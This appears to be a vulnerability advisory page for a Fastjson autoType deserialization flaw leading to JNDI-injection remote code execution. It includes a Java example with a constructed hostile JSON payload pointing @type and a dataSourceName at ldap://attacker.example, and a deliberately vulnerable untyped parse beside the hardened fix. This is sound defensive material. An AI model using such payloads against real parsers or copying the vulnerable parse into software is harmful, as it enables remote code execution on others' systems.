CVE-2025-70974

CVSS 10.0 Critical · EPSS 0.6% · CWE-829 (Inclusion of Functionality from Untrusted Control Sphere)
In short

Fastjson before version 1.2.48 lets whoever controls the JSON input choose which Java class the parser instantiates. When the autoType feature is honoured, a JSON object whose @type key names a Java class is deserialized by instantiating that class and passing the object's remaining members to its public setters. If one of those setters performs a JNDI lookup, the attacker-supplied URL elsewhere in the same document is what gets resolved, and the result is remote code execution on the parsing host.

Technical detail

Fastjson's autoType feature resolves the class named by a @type key in the JSON input and instantiates it, without an adequate check of which classes are permitted. During deserialization the parser calls public methods of that class (typically its setters) with values taken from the same document, so a class whose setter performs a JNDI lookup turns an attacker-supplied ldap:// or rmi:// URL into a remote code load: a deserialization RCE via JNDI injection. The class-name check introduced after CVE-2017-18349 was incomplete, which is why this is tracked as a separate issue; a later bypass of the same mechanism is tracked as CVE-2022-25845.

Summary generated and translated by AI from the official description.

Official description

Fastjson before 1.2.48 mishandles autoType because, when an @type key is in a JSON document, and the value of that key is the name of a Java class, there may be calls to certain public methods of that class. Depending on the behavior of those methods, there may be JNDI injection with an attacker-supplied payload located elsewhere in that JSON document. This was exploited in the wild in 2023 through 2025. NOTE: this issue exists because of an incomplete fix for CVE-2017-18349. Also, a later bypass is covered by CVE-2022-25845.

CVSS vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
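The following is an added example, not code from this advisory or from the Fastjson project. It places the untyped, @type-honouring parse the description refers to beside the hardened form a practitioner would ship: fix the target type at the call site and put the parser in safeMode so that any @type key is rejected before a class lookup happens. The class `FastjsonAutoTypeDemo`, the `Order` DTO, the class name inside the hostile payload and the `ldap://attacker.example` URL are constructed placeholders; the Fastjson calls (`JSON.parseObject`, `ParserConfig.setAutoTypeSupport`, `ParserConfig.setSafeMode`) are the library's real API.

```java
// Added example (not the advisory's or the Fastjson project's code).
// Contrasts the untyped autoType parse with a hardened, fixed-type parse.
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONException;
import com.alibaba.fastjson.parser.ParserConfig;

public class FastjsonAutoTypeDemo {

    // The single type this endpoint is meant to accept (constructed for the example).
    public static final class Order {
        public String id;
        public int quantity;
    }

    // Constructed hostile document. "@type" names a class chosen by the sender.
    // With autoType honoured, Fastjson resolves that class by name, instantiates it
    // and hands the remaining members to its public setters. If a setter performs a
    // JNDI lookup, the URL supplied in the same document is what gets looked up.
    // The class name is a placeholder, not a specific gadget.
    static final String HOSTILE_JSON =
        "{\"@type\":\"com.example.AttackerChosenClass\","
      + "\"dataSourceName\":\"ldap://attacker.example:1389/x\",\"autoCommit\":true}";

    // Constructed benign document for the same endpoint.
    static final String BENIGN_JSON = "{\"id\":\"A-100\",\"quantity\":2}";

    // VULNERABLE PATTERN: untyped parse of untrusted input. The document, not the
    // code, decides which class is instantiated. On the affected versions the
    // built-in class-name check could be bypassed even with autoType nominally off,
    // which is the "incomplete fix" the advisory refers to; upgrading is mandatory.
    static Object parseUntrustedVulnerable(String json) {
        return JSON.parseObject(json);
    }

    // HARDENED PATTERN, step 1: lock the global parser configuration once at startup.
    static void hardenParserConfig() {
        ParserConfig cfg = ParserConfig.getGlobalInstance();
        cfg.setAutoTypeSupport(false);   // never honour @type from input
        cfg.setSafeMode(true);           // Fastjson 1.2.68+: reject any @type outright
        // Equivalent JVM flag for code you cannot change: -Dfastjson.parser.safeMode=true
    }

    // HARDENED PATTERN, step 2: name the expected type at the call site. With safeMode
    // on, a document carrying @type fails with JSONException before any class lookup.
    static Order parseOrder(String json) {
        return JSON.parseObject(json, Order.class);
    }

    public static void main(String[] args) {
        hardenParserConfig();

        Order ok = parseOrder(BENIGN_JSON);
        System.out.println("benign parsed: id=" + ok.id + " quantity=" + ok.quantity);

        try {
            parseOrder(HOSTILE_JSON);
            System.out.println("UNEXPECTED: hostile document was accepted");
        } catch (JSONException e) {
            // Expected outcome with safeMode: "safeMode not support autoType : ..."
            System.out.println("hostile document rejected: " + e.getMessage());
        }
    }
}
```

Run it against a release that also closes the later bypass the description mentions (CVE-2022-25845, fixed in 1.2.83), since on the affected range the configuration alone is not a fix: the version must move first, and safeMode plus a fixed target type then removes the attack surface rather than relying on the class-name filter. `parseUntrustedVulnerable` is included only to show the shape of the dangerous call; it is deliberately never invoked.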
Affected products
Alibaba · Fastjson